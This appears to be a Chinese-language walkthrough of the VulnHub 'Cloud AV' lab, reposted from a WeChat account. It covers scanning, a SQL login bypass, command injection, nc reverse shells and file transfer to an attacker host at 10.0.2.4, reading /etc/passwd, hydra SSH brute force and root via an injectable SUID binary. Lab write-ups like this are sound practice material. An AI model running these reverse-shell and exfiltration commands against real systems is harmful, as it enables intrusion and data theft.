0x01 主机发现
for i in $(seq 1 254); do sudo arping -c 2 10.0.2.$i; done
0x02 端口扫描
sudo nmap -p- 10.0.2.5
0x03 服务识别
sudo nmap -p22,8080 -sV 10.0.2.5
0x04 堆叠注入
访问Web服务瞧瞧
有输入框,挂BP抓个包看看
基本全明文,那把参数替换成特殊字符试试,把键盘上所有的特殊字符做成字典,过一遍看有无报错
看到报错信息了,在页面上注入查看详细信息。
看到报错信息,是sqlite数据库,连数据库语句都报出来了。
尝试万能密码绕过
" or 1=1--
猜测功能为:输入文件名,调用杀毒程序进行查杀。
系统应该是执行 avscan fileName 类似的命令,尝试堆叠注入。
hello | id
堆叠注入成功,此处存在命令注入。
由上面的服务发现可知,系统存在python2环境,此处可以用代码执行反弹shell,考虑代码过长,选择另一种更为常见的方式,nc反弹shell。
nc常用在反弹shell,既可主动发起连接,也可被动等待连接,常用命令:
# 主动发起连接,-e参数是指连接交予shnc ip 4444 -e /bin/sh# 被动接受连接nc -nvlp 4444
这里有个需要注意的地方,不同发行版的Linux用的是不同版本的nc,部分nc没有-e参数,不指定权限交予程序。
先尝试用带参数e注入,无连接反应。
这里介绍一种新思路:
1、受害机通过nc建立一个普通连接
2、把第一个连接的输入重定向到受害者本地的/bin/bash
3、把/bin/bash的输入重定向到另一个nc连接
首先,本地开启两个Nc端口监听
# 第一个Nc监听,用于执行命令nc -nvlp 3333# 第二个Nc监听,用于输入执行结果nc -nvlp 4444
受害机执行
# hello为堆叠注入,hello | nc 10.0.2.4 3333 | /bin/bash | nc 10.0.2.4 4444
得到反弹shell,3333端口用于命令输入,4444端口用于结果输出。
0x05 SSH爆破尝试
进行信息收集,看到database.sql。
由先前报错可知,采用的是sqlite数据库,转了一圈发现本地没有sqlite环境读取,则把文件下载到本地来读取。
# nc进行文件传输# kali进行nc端口监听nc ip 5555 > db.sql# 目标机进行nc数据传输nc ip 5555 < database.sql
# 本地读取sqlite文件# 本地读取sqlite文件sqlite3.open db.sql.database.dump
读取当前系统有bash权限的用户
cat /etc/passwd | grep /bin/bash得到 cloudav & scanner。
制作字典尝试爆破SSH。
vi user.txt # cloudav | scannervi password.txt # myinvitecode123 | mysecondinvitecode | cloudavtech | mostsecurescannerhydra -L user.txt - P pass.txt ssh://ip
结果全部错误,木大。
0x06 命令行提权
直接在反弹shell尝试提权吧。
兜兜转转一圈下来,没发现啥内核提权漏洞。只有用于搭建网站的前后端文件、数据库文件。
这时,习惯用 ls -l 命令的我发现了疑点
在上个目录下发现了suid属性的文件,所属是root用户,并且其他组用户还有执行权限。
如果用 root 所属的文件创建新的连接,那就是一个root权限的连接。
刚好有个.c的源文件,看看这个文件是干嘛的
简单来讲就是,执行软件更新命令,那就涉及命令执行,尝试下最开始的堆叠注入吧。
./update_cloudav "id | nc 10.0.2.4 6666 | /bin/bash | nc 10.0.2.4 7777"
拿到 root 权限了。
靶机地址:https://www.vulnhub.com/entry/boredhackerblog-cloud-av,453/声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白名单。
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与本公众号无关。
✦
✦
原文始发于微信公众号(白帽学子):CLOUD AV打靶记录(附靶机地址)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论